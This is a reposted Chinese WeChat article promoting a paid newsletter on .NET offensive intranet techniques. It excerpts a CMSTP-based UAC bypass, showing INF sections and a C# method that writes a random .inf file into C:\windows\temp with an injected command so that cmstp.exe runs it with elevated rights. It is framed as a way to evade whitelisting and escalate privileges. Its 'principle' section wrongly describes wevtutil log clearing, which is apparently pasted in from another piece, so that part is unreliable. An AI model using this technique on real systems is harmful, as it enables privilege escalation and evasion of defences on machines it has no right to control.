.NET内网实战:调用CMSTP实现UAC绕过
2024-12-29 02:8:0 Author: mp.weixin.qq.com(查看原文) 阅读量:0 收藏

01

阅读须知

此文所节选自小报童《.NET 内网实战攻防》专栏,主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,对内网和后渗透感兴趣的朋友们可以订阅该电子报刊,解锁更多的报刊内容。

02

基本介绍

本文内容部分节选自小报童《.NET 通过调用CMSTP进程实现UAC绕过》,完整的文章内容请加入小报童后订阅查看。现在限时只需59元,永久买断!目前已有280+位朋友抢先预定,我们会长期更新,对.NET内网安全的朋友们请尽快订阅该报刊!

03

原理分析

在渗透测试或攻击活动中,清理日志是一项关键的操作,用于掩盖攻击者的行为,避免被防御者发现和追踪。通过 .NET 程序调用 wevtutil 命令,可以高效地清空所有的系统日志,这种方法具有较强的隐蔽性,能够绕过大部分传统的日志分析工具,为攻击者提供了一种强有力的反取证手段。

3.1 [version]

cmstp.exe的主要用途是帮助 IT 管理员或用户快速部署 VPN 配置或网络连接文件。一个合法的VPN配置信息一般包括网络配置、用户凭据、注册表修改、安装命令等内容。首先,我们看到配置文件中的头部version部分内容,具体如下所示.

 
[version]
Signature=$chicago$
AdvancedINF=2.5
此处的 Signature=$chicago$,是标准的 INF 文件签名,表示文件兼容 Windows.

3.2 [DefaultInstall]

在 CMSTP (Connection Manager Profile Installer) 的 INF 文件中,[DefaultInstall] 部分定义了安装过程中需要执行的主要任务。

 
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

CustomDestination 参数 表示指向一个逻辑节点(Section),通常是涉及文件自定义的安装位置。

3.3 [AllUser_LDIDSection]

此处的 [AllUSer_LDIDSection] 定义了注册表的修改操作,将安装路径写入 HKLM 的 InstallPath 键中。

 
[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

此处配置的 CMMGR32.EXE 是 Windows 系统中的一个合法可执行文件,正常情况下通过cmstp.exe安装配置文件后,交由 CMMGR32.exe 加载执行。

3.4 编码实现

定义一个方法 SetInfFile,主要功能是动态随机生成一个 .inf 配置文件,并将指定的命令注入其中。

 
public static string SetInfFile(string CommandToExecute)
{
		string value = Path.GetRandomFileName().Split(new char[]
		{
			Convert.ToChar(".")
		})[0];
		string value2 = "C:\\windows\\temp";
		StringBuilder stringBuilder = new StringBuilder();
		stringBuilder.Append(value2);
		stringBuilder.Append("\\");
		stringBuilder.Append(value);
		stringBuilder.Append(".inf");
		StringBuilder stringBuilder2 = new StringBuilder(CMSTPBypass.InfData);
		stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
		File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
		return stringBuilder.ToString();
}

生成的 *.inf 扩展名文件位于 C:\windows\temp\ 目录下,另外, 替换模板中的占位符 REPLACE_COMMAND_LINE 为传入的命令 CommandToExecute,比如,如果传入 cmd.exe /c calc.exe,运行如下图所示。

综上,通过对 cmstp.exe 的深入剖析,我们可以看到,合法工具在特定条件下同样可能成为攻击链中的关键环节。利用其对自定义 INF 文件的支持,攻击者能够在不触发传统安全防护机制的情况下,执行任意命令或代码,从而实现绕过白名单和权限提升的目标。要了解完整或者更多的内网安全方向的文章,可以移步订阅小报童《.NET 内网实战攻防》电子报刊。

04

欢迎加入.NET 电子报刊

我们的小报童电子报刊【.NET内网安全攻防】也开始运营,引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足,为用户读者提供更佳的阅读体验。如果您对阅读体验的需求比较高,那么可以订阅这个专栏

次电子报刊《.NET 内网安全攻防》专栏,内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,可细分为以下8个方向。

1) .NET 安全防御绕过
2) .NET 本地权限提升
3) .NET 内网信息收集
4) .NET 内网代理通道
5) .NET 内网横向移动
6) .NET 目标权限维持
7) .NET 数据传输外发
8) .NET 目标痕迹清理

原价899,现在限时只需59元,永久买断目前已有280+位朋友抢先预定,我们会长期更新,初步计划保持每周更新1-2篇新内容,对.NET内网安全的朋友们请尽快订阅该报刊!

每增加五十人涨价10元,抓紧订阅,超值!订阅后请关注公众号:dotNet安全矩阵,发送订单截图和您的微信号,邀请您加入专属交流群。感兴趣的朋友,可以点击链接:https://xiaobot.net/p/dotNetAttack,或者扫描下方海报微信二维码加入即可订阅后小报童定时会将最新内容通过微信推送给您。


文章来源: https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247497790&idx=1&sn=261925ae514502326884aa68771649f5&chksm=fa5956d3cd2edfc5580c209f4853e51a46eeeec108f8be60759083c9c853c5234d65a0ca5bd1&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh